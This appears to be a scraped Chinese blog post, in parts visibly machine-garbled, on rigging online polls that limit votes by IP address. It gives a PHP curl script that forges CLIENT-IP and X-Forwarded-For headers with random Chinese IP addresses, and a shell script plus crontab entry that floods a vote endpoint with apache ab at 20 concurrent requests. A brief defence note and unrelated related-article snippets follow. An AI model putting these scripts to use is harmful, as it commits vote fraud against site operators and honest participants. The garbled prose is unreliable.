在投票系统方法的原则刷票(突破ip限制刷票PHP版)

让我谈一点:事实上,没有一个突破ip限制,因为实际上,,这项限制server结束,client牛逼,不能突破..只要是能够始终重复刷票罢了

一个朋友突然来了个网站,让我帮她投票..我是一个更好的人说话,为了帮助她投.顺便说一下分析本网站,有ip限制,可是投票是一个ajax请求.那么办法就出来了.

非常多投票PC站点都是依靠限制ip,来限制投票人数.那么我用curl伪造IP,那么就能够轻易制造多个IP进行投票.

以下贴上PHP代码:

因为对方是GET AJAX请求,我这里就贴上GET方法,POST方法请自行改动

<?php
/**
 * @author 邹颢	[email protected]
 */
$ip_long = array(
	array('607649792', '608174079'), //36.56.0.0-36.63.255.255
	array('1038614528', '1039007743'), //61.232.0.0-61.237.255.255
	array('1783627776', '1784676351'), //106.80.0.0-106.95.255.255
	array('2035023872', '2035154943'), //121.76.0.0-121.77.255.255
	array('2078801920', '2079064063'), //123.232.0.0-123.235.255.255
	array('-1950089216', '-1948778497'), //139.196.0.0-139.215.255.255
	array('-1425539072', '-1425014785'), //171.8.0.0-171.15.255.255
	array('-1236271104', '-1235419137'), //182.80.0.0-182.92.255.255
	array('-770113536', '-768606209'), //210.25.0.0-210.47.255.255
	array('-569376768', '-564133889'), //222.16.0.0-222.95.255.255
);
$rand_key = mt_rand(0, 9);
$ip= long2ip(mt_rand($ip_long[$rand_key][0], $ip_long[$rand_key][1]));//随机生成国内某个ip
$url='localhost/ip.php';//这里请填写投票的请求地址
$ch = curl_init($url);
$header = array(
	"CLIENT-IP:{$ip}",
	"X-FORWARDED-FOR:{$ip}",
);
curl_setopt($ch,CURLOPT_HTTPHEADER,$header);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ; // 获取数据返回
curl_exec($ch);
curl_close($ch);

前部分是随机生成国内的某个ip,然后用curl模拟请求.

因为站点限制是一个ip限制1个小时投30个票,因此,我这里就是随机的.

假设站点是限制1个ip投1个,那么最好把ip改动为顺序生成国内ip,这样能够不反复.

然后我在开启,apache ab,每次并发20个投票..非常快票就刷上去了.

那么面对这种恶意刷票有什么解决的方法呢?

我没有什么好的办法防御.可是我这种curl实际上就是webservice訪问,这种訪问是不带session或者cookie的,当然,curl也能够模拟带上cookie,然后在带上phpsessionid从而来带上session.

可是对于一个未知站点而言,并不知道他的处理方式.因此,假设推断是否存在session会有效抵挡一批刷票.可是在提示的时候切勿提示是缺少session这种文字.最好在给session一个有效时期,这种安全度会提高(可是假设刷票者知道这种原理,并不意味能防御住他)

补充一点:非常多代码上说可以获取訪问者真实的IP地址,这个我没有遇过到正确的可以获取用户真实ip的方法.假设有的话,欢迎留言

假设有什么好的防御方案,希望留言.

有时候假设超时可能会导致脚本中断,最好在配合一个crond来每分钟都运行一下脚本

脚本代码为:

#!/bin/sh
pid=`ps -ef |grep localhost/vote.php |grep vote.php | awk '{print $2}'`;
if [[ $pid == "" ]];then
	echo "vote is start";
	nohup /usr/bin/ab -n 100000 -c 20 http://localhost/vote.php
else
	echo "vote.php is running";
fi

这个脚本就是每分钟推断这个进程存在不,存在的话,就无论,不存在的话,就启动这个进程..

另外能够不用使用nohup来后台运行

在开启crond每分钟跑起来

crontab -e

编辑crond任务

* * * * * /www/web/default/Controller/Script/vote.sh

前5个*号就是代表每一个分钟都运行这个脚本..假设不详,请查阅cron资料

在开启cron

service crond start

伟大的工作藁城,安心让他刷自己主动.你可以忙别的事情

Windows计划你自己的任务系统,我不是在这里发布的代码

时间: 2024-10-09 05:08:39

在投票系统方法的原则刷票(突破ip限制刷票PHP版)的相关文章

关于投票系统刷票方式原理(突破ip限制刷票PHP版)

先说一点:其实不算是突破ip限制,因为事实上,这个限制是在服务器端的,客户端在牛逼,也突破不了..只是可以一直刷多次票罢了 一个朋友突然发了一个网站,让我帮她投投票..我这人一项比较好说话,就帮她投了.顺便分析了这个网站,发现这个网站的投票系统有ip限制,但是投票是一个ajax请求.那么办法就出来了. 很多投票PC网站都是依靠限制ip,来限制投票人数.那么我用curl伪造IP,那么就可以轻易制造多个IP进行投票. 下面贴上PHP代码: 由于对方是GET AJAX请求,我这里就贴上GET方法,PO

简单的刷票系统(突破IP限制进行投票)

前言 相信大家平时肯定会收到朋友发来的链接,打开一看,哦,需要投票.投完票后弹出一个页面(恭喜您,您已经投票成功),再次点击的时候发现,啊哈,您的IP(***.***.***.***)已经投过票了,不能重复投票.这时候,我们可能会想,能不能突破ip地址的限制进行刷票呢?有了这样的想法,那就去做吧,下面我将介绍我这个简单的刷票系统,仅供有需求的园友们参考. 1.系统设计 系统主要实现的是突破IP限制进行刷票,其中,由IP采集模块负责从互联网上爬取代理IP,放入阻塞队列,该任务会定期执行.之后由投票

突破IP限制动态替换代理ip。

需要导入的两个jar包 实现的javabean <span style="font-size:18px;">package com.jx.po; public class ProxyPo { private String id; private String ip; private String port; private String area; public String getId() { return id; } public void setId(String i

全球定位IP位置 2018(离线版)

球定位IP位置 2018(离线版) 这次写的软件使用Python写的,所以体积可能有点大 我特地写了GUI打包成了Exe可执行文件,方便小白使用== 只要输入目标ip就能显示目标所在的国家城市和经纬度 精确程度在90%以上 百度云下载地址: 链接:https://pan.baidu.com/s/1C5QVjPGLJ_7R6mTmWVm9QA 密码:b0uf 原文地址:https://www.cnblogs.com/hackhyl/p/9532369.html

Tor网络突破IP封锁,爬虫好搭档【入门手册】

本文地址:http://www.cnblogs.com/likeli/p/5719230.html 前言 本文不提供任何搭梯子之类的内容,我在这里仅仅讨论网络爬虫遇到的IP封杀,然后使用Tor如何对抗这种封杀.作为一种技术上的研究讨论. 场景 我们编写的网络爬虫全网采集的时候总会有一些网站有意识的保护自己的网站内容,以防止网络爬虫的抓取.常见的方式就是通过身份验证的方式来进行人机识别.也就是在登陆(查询)的入口增加或者加固防御.这些防御有那些呢?我目前见到的有:各种验证码.参数的加密.在前端JS

简单爬虫,突破IP访问限制和复杂验证码,小总结

简单爬虫,突破复杂验证码和IP访问限制 文章地址:http://www.cnblogs.com/likeli/p/4730709.html   好吧,看题目就知道我是要写一个爬虫,这个爬虫的目标网站有一些反爬取意识,所以就有了本文了. 我先说说场景吧: 由于工作需要,平时有一大堆数据需要在网上查询,并归档存库.某次,这种任务也给我安排了一份.观察了一网站,我的第一反应就是用爬虫取抓取.这种机械的工作何必人工呢? 由于这家网站有反爬虫的意识,做了些工作,给我的爬虫去爬取数据造成了某些麻烦. 先列举

刷票 变 IP

qqzeng-ip.dat IP库读取python版

qqzeng-ip.dat是一个特殊格式的dat文件,可以快速的查找IP对应的地理位置信息.据作者测试的结果来看,是100万ip查找速度0.5秒. 当然这和语言有非常大的关系,python的循环性能一直是为人所诟病的.目前python版本测试的结果是10万IP的查找速度是3.X秒左右,还算够用,毕竟真实情况下的30秒~5分钟内的日志不太可能出现一批数据中的不重复IP超过10万个. 作者提供了解析dat的java/c/php脚本,但没有提供python版本的.所以我就写了一个,以供需要用pytho

获取本地连接ip地址(通用版)

@echo off & setlocal enabledelayedexpansionrem 如果系统中有route命令,优先采用方案1:for /f "tokens=3,4" %%a in ('route print^|find "0.0.0.0 0.0.0.0"') do ( set "gate=%%a" & set "ip=%%b")for /f "tokens=2" %%a in (